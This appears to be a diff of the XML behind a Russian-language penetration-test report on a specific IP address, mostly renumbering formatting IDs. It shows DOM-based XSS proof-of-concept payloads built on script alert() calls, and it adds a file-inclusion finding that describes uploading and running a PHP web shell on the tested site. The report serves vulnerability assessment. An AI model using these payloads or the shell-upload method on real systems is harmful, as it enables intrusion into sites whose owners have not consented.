               <w:t xml:space="preserve">Базовая оценка 10.0 </w:t>
             </w:r>
           </w:p>
@@ -17066,7 +17329,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Уязвимость была протестирована автоматически во время сканирования ZAP. Для эксплуатации необходимо перейти по ссылке </w:t>
       </w:r>
-      <w:hyperlink r:id="rId63" w:tooltip="http://92.51.39.106:7799/server.html" w:history="1">
+      <w:hyperlink r:id="rId64" w:tooltip="http://92.51.39.106:7799/server.html" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="ad"/>
@@ -17215,7 +17478,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc158883776"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc158883776"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17223,7 +17486,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Отчет о проведении анализа защищенности IP 92.51.39.106</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="20"/>
+      <w:bookmarkEnd w:id="19"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -17238,7 +17501,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc158883777"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc158883777"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -17266,12 +17529,12 @@
         </w:rPr>
         <w:t>proof</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="21"/>
+      <w:bookmarkEnd w:id="20"/>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
@@ -17307,7 +17570,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
@@ -17327,7 +17590,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="41"/>
@@ -17340,7 +17603,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId64" w:tooltip="http://92.51.39.106:8060/users/login.php." w:history="1">
+      <w:hyperlink r:id="rId65" w:tooltip="http://92.51.39.106:8060/users/login.php." w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="ad"/>
@@ -17398,7 +17661,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17432,7 +17695,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId65"/>
+                    <a:blip r:embed="rId66"/>
                     <a:stretch/>
                   </pic:blipFill>
                   <pic:spPr bwMode="auto">
@@ -17453,7 +17716,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="41"/>
@@ -17461,7 +17724,7 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="0" w:firstLine="709"/>
       </w:pPr>
-      <w:hyperlink r:id="rId66" w:tooltip="http://92.51.39.106:7799/server.html." w:history="1">
+      <w:hyperlink r:id="rId67" w:tooltip="http://92.51.39.106:7799/server.html." w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="ad"/>
@@ -17527,7 +17790,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17561,7 +17824,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId67"/>
+                    <a:blip r:embed="rId68"/>
                     <a:stretch/>
                   </pic:blipFill>
                   <pic:spPr bwMode="auto">
@@ -17582,7 +17845,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
@@ -17607,7 +17870,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
@@ -17620,7 +17883,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
@@ -17639,7 +17902,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Cross Site Scripting (DOM Based) </w:t>
       </w:r>
-      <w:hyperlink r:id="rId68" w:tooltip="http://92.51.39.106:8060/" w:history="1">
+      <w:hyperlink r:id="rId69" w:tooltip="http://92.51.39.106:8060/" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="ad"/>
@@ -17663,7 +17926,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -17702,7 +17965,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
@@ -17722,7 +17985,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:sz w:val="18"/>
@@ -17730,7 +17993,6 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17740,11 +18002,10 @@
         </w:rPr>
         <w:t>html</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:sz w:val="18"/>
@@ -17764,7 +18025,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:sz w:val="18"/>
@@ -17779,7 +18040,7 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">    &lt;</w:t>
+        <w:t xml:space="preserve">    &lt;script&gt;</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -17789,7 +18050,7 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>script&gt;</w:t>
+        <w:t>alert(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -17799,12 +18060,12 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>alert('Cross Site Scripting (DOM Based) 2')&lt;/script&gt;"&gt;</w:t>
+        <w:t>'Cross Site Scripting (DOM Based) 2')&lt;/script&gt;"&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17841,7 +18102,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17852,7 +18113,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17888,7 +18149,7 @@
                         </pic:cNvPicPr>
                       </pic:nvPicPr>
                       <pic:blipFill>
-                        <a:blip r:embed="rId69"/>
+                        <a:blip r:embed="rId70"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
@@ -17935,7 +18196,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17946,7 +18207,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
@@ -17989,7 +18250,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -18010,7 +18271,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
       </w:pPr>
@@ -18025,7 +18286,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:sz w:val="18"/>
@@ -18053,7 +18314,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:sz w:val="18"/>
@@ -18093,7 +18354,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:sz w:val="18"/>
@@ -18164,6 +18425,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -18172,7 +18434,6 @@
         </w:rPr>
         <w:t>пост</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -18215,7 +18476,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:sz w:val="18"/>
@@ -18230,7 +18491,7 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">    &lt;button type="submit"&gt;&lt;script&gt;</w:t>
+        <w:t xml:space="preserve">    &lt;button type="submit"&gt;&lt;script&gt;alert('XSS!</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -18240,7 +18501,7 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>alert(</w:t>
+        <w:t>');&lt;</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -18250,12 +18511,12 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>'XSS!');&lt;/script&gt;&lt;/button&gt;</w:t>
+        <w:t>/script&gt;&lt;/button&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -18292,14 +18553,14 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
@@ -18319,7 +18580,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -18403,7 +18664,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -18414,7 +18675,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -18426,7 +18687,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
@@ -18507,7 +18768,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -18577,7 +18838,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -18697,7 +18958,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -18718,7 +18979,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -18801,7 +19062,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -18812,13 +19073,13 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -18937,7 +19198,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -18948,7 +19209,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
@@ -18968,7 +19229,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19052,7 +19313,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
@@ -19062,7 +19323,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
@@ -19072,7 +19333,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
@@ -19120,7 +19381,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -19177,7 +19438,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -19216,14 +19477,14 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -19246,7 +19507,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -19258,7 +19519,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
@@ -19340,7 +19601,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19351,7 +19612,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
@@ -19421,7 +19682,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -19496,7 +19757,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -19531,7 +19792,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -19587,7 +19848,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -19599,7 +19860,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19682,7 +19943,356 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="af6"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="af6"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="af6"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="af6"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="af6"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ource Code Disclosure - File Inclusion</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="af6"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Для эксплуатации загружаем </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Далее находим его на сайте и запускаем.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="af6"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5305425" cy="3429000"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="9" name="Рисунок 9"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="9" name="shell_execute00.jpg"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId88">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5305425" cy="3429000"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
